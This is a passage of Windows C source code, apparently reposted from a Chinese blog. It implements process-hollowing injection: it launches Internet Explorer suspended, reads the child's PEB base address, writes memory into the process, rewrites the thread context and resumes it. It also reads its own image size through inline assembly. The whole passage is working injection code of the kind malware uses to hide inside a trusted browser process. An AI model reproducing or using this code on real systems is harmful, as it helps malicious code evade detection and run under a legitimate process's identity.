x] ",ThreadCxt.Edx);
printf("EIP = [0x%08x] ",ThreadCxt.Eip);
#endif
SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread);
}
else
{
printf("WirteMemory Failed,code:%d ",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
else
{
printf("VirtualMemory Failed,code:%d ",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
return TRUE;
}
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;
_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)
{
STARTUPINFO si = {0};
DWORD *PPEB;
DWORD read;
// 使用挂起模式启动ie
if( CreateProcess(NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi)||MessageBox(0,":(",":(",0))
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);
PPEB = (DWORD *)pThreadCxt->Ebx;
ReadProcessMemory(pi->hProcess,&PPEB[2],(LPVOID)&(pChildProcess->dwBaseAddress),sizeof(DWORD),&read);
return TRUE ;
}
return FALSE;
}
转载本站文章请注明,转载自:Chinadu`s Blog